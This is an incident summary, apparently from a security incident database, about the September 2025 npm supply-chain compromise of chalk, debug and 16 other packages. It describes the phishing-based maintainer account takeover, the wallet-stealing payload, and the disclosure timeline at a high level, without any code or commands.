Supply chain
npm Supply Chain Attack: chalk, debug, and 16 Other Packages Compromised
Primary Source βIncident Details
On September 8, 2025, 18 widely used npm packages were compromised via an account takeover of maintainer ‘qix’. Affected packages collectively receive 2.6+ billion downloads per week. Malicious versions were live for approximately 2 hours before detection and removal. The malicious payload targeted browser-based crypto wallets by hooking web3 APIs to reroute transactions. CISA issued an advisory on September 23, 2025. The malicious code reached 1 in 10 cloud environments during the 2-hour window. A follow-on campaign ‘Shai-Hulud 2.0’ was identified in November 2025. Exemplary case of npm ecosystem account takeover via phishing and adversary-in-the-middle credential capture defeating TOTP-based MFA.
Technical Details
- Initial Attack Vector
- Phishing / adversary-in-the-middle attack against package maintainer 'qix' (Josh Junon): fake npm 2FA reset email (npmjs.help domain) captured username, password, and live TOTP code
- Vendor / Product
- npm registry
- Software Package
chalk, debug, ansi-styles, strip-ansi, duckdb (18 packages total)- Malware Family
- Browser crypto wallet stealer (hooking window.ethereum, Solana APIs, fetch/XHR)
Timeline
- 2025-09-08 Breach occurred
- 2025-09-08 Publicly disclosed